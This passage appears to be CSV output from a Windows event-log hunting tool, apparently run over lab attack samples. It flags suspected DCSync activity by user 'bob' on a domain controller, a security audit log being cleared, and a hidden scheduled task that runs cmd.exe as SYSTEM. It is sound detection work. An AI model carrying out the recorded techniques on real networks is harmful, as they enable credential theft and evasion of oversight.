76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242599 + + + + + Security + DC1.insecurebank.local + + + + + 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242598 + + + + + Security + DC1.insecurebank.local + + + + + 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 2171293 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + \LMST + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Date>2020-09-02T04:47:49.74-07:00</Date> + <Author>a-jbrown</Author> + <Description>00304d6e</Description> + <URI>\LMST</URI> + </RegistrationInfo> + <Triggers> + <TimeTrigger> + <StartBoundary>2020-02-09T04:47:48</StartBoundary> + <EndBoundary>2020-02-09T04:47:58</EndBoundary> + <Enabled>true</Enabled> + </TimeTrigger> + </Triggers> + <Principals> + <Principal id="Author"> + <RunLevel>HighestAvailable</RunLevel> + <UserId>SYSTEM</UserId> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <Duration>PT10M</Duration> + <WaitTimeout>PT1H</WaitTimeout> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="Author"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/c echo testing &gt; c:\users\public\out.txt</Arguments> + </Exec> + </Actions> +</Task> + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242597 + + + + + Security + DC1.insecurebank.local + + + + + 30F197FC-BECA-48D6-923E-A52A437119D3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242596 + + + + + Security + DC1.insecurebank.local + + + + + 30F197FC-BECA-48D6-923E-A52A437119D3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2982081 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x364f7 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242595 + + + + + Security + DC1.insecurebank.local + + + + + AF3067E0-BB6F-47C2-AA20-F3F458797F38 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + 